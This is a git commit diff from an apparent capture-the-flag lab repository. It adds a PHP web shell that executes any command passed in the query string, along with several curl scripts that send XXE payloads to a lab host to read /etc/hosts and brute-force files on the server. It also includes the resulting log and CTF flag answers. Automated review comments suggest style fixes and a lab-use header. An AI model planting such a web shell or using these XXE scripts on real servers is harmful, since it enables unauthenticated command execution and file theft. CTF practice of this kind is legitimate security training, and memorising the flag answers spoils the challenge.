Sivert V. Sæther 2024-12-08 17:19:06 +01:00
commit 8ffc4db7a8
9 changed files with 269 additions and 0 deletions

1/somg.mp3 Normal file


1/song.mp3 Executable file


22
3/shell.php Normal file

@ -0,0 +1,22 @@
<html>
<style>
body {
color: lime;
background-color: #333;
}
</style>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
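Review bot: The `system($_GET['command'] . ' 2>&1');` call inside the `<?php` block runs whatever the query string carries with no authentication and no allowlist, and nothing in the file states what this artifact is or where it is meant to live. Add a header before the `<html>` line, `<?php /* CTF lab web shell: unauthenticated command execution. Isolated lab use only; never deploy or leave on a reachable host. */ ?>`, so anyone who finds this file in the repository, or a scanner that keys on system() over request input, sees the intent immediately. The form's `name` attribute is built from basename($_SERVER['PHP_SELF']) where an `action` would normally go; the form still posts to the current URL, so this is a style point only.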

23
5/CHANGELOG Normal file

@ -0,0 +1,23 @@
commit 3f786850e387550fdab836ed7e6dc881de23001b (HEAD -> master, origin/master, origin/HEAD)
Author: Mayor Malware - Wareville <mayor@wareville.org>
Date: Wed Dec 4 21:24:22 2024 +0200
Fixed the wishlist.php page THM{m4y0r_m4lw4r3_b4ckd00rs}
commit 89e6c98d92887913cadf06b2adb97f26cde4849b (tag: v1.0.0)
Author: Software - Wareville <software@wareville.org>
Date: Thu Dec 4 14:45:18 2024 +0200
Almost done with the wishlists page, needs to handle XML parsing
commit 2b66fd261ee5c6cfc8de7fa466bab600bcfe4f69
Author: Software - Wareville <software@wareville.org>
Date: Tue Dec 2 15:20:57 2024 +0200
Finally done with the landing page and initial CSS
commit e983f374794de9c64e3d1c1de1d490c0756eeeff
Author: Software - Wareville <software@wareville.org>
Date: Tue Dec 2 15:19:33 2024 +0200
Initial commit

1
5/trgt Normal file

@ -0,0 +1 @@
10.10.148.114

12
5/wish.sh Executable file

@ -0,0 +1,12 @@
#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
-d "<!--?xml version='1.0' ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_1.txt'> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>"
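Review bot: `target=`cat trgt`` on the second line never checks that `trgt` exists or is non-empty, so a missing file leaves `target` empty and the request silently goes to `http:///wishlist.php`; the same line appears in 5/wishes.sh and 5/wishlist.sh. Replace it with `target=$(cat trgt) || exit 1` followed by `: "${target:?trgt is empty}"`, which is POSIX, fails loudly, and drops the backticks. A one-line header comment naming the lab host file and what the request is for would also help, since the script itself only says `trgt`.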

176
5/wishes.log Normal file

@ -0,0 +1,176 @@
Trying wish_1.txt...
The product ID: Wish #1
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_2.txt...
The product ID: Wish #2
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_3.txt...
The product ID: Wish #3
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_4.txt...
The product ID: Wish #4
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_5.txt...
The product ID: Wish #5
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_6.txt...
The product ID: Wish #6
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_7.txt...
The product ID: Wish #7
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_8.txt...
The product ID: Wish #8
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_9.txt...
The product ID: Wish #9
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_10.txt...
The product ID: Wish #10
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_11.txt...
The product ID: Wish #11
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_12.txt...
The product ID: Wish #12
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_13.txt...
The product ID: Wish #13
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_14.txt...
The product ID: Wish #14
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_15.txt...
The product ID: Wish #15
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
PS: The flag is THM{Brut3f0rc1n6_mY_w4y}
is invalid.
Trying wish_16.txt...
The product ID: Wish #16
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_17.txt...
The product ID: Wish #17
Name: Mayor Malware
Address: Test
---------------------------------------
Product: Waredy Cane
Quantity: 1
---------------------------------------
is invalid.
Trying wish_18.txt...
The product ID: Wish #18
Name: Test
Address: Test
---------------------------------------
Product: Wareville's Jolly Cap
Quantity: 1
---------------------------------------
is invalid.
Trying wish_19.txt...
The product ID: Wish #19
Name: Test
Address: TEst
---------------------------------------
Product: Teddy of the Ville
Quantity: 1
---------------------------------------
is invalid.
Trying wish_20.txt...
The product ID: is invalid.
Trying wish_21.txt...
Failed to parse XML

23
5/wishes.sh Executable file

@ -0,0 +1,23 @@
#!/bin/bash
target=`cat trgt`
opts="-sH 'Content-Type: application/xml'"
declare -i i=1
#i=20
while [ $i -gt 0 ]; do
echo "Trying wish_$i.txt..."
p="<!--?xml version='1.0' ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM '/var/www/html/wishes/wish_$i.txt'> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>"
out=`curl $opts http://$target/wishlist.php -d "$p"`
echo "$out"
echo "$out" | grep -q 'Failed to parse XML'
[ $? -eq 0 ] && break;
sleep 1
i+=1
done
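Review bot: `opts="-sH 'Content-Type: application/xml'"` on the third line does not do what it looks like: when `curl $opts` word-splits it, the single quotes are literal, so curl receives `-sH` with `'Content-Type:` and then `application/xml'` as a stray extra argument (ShellCheck SC2089/SC2090). Keep the options in an array, `opts=(-sH 'Content-Type: application/xml')`, and expand it as `out=$(curl "${opts[@]}" "http://$target/wishlist.php" -d "$p")`, which also quotes the URL and replaces the backticks. `[ $? -eq 0 ] && break;` after the grep is a style point, `if grep -q 'Failed to parse XML' <<<"$out"; then break; fi` reads the status directly, and the commented-out `#i=20` on the fifth line is dead and should be removed or explained.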

12
5/wishlist.sh Executable file

@ -0,0 +1,12 @@
#!/bin/sh
target=`cat trgt`
curl -iH 'Content-Type: application/xml' "http://$target/wishlist.php" \
-d '<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts"> ]>
<wishlist>
<user_id>1</user_id>
<item>
<product_id>&payload;</product_id>
</item>
</wishlist>'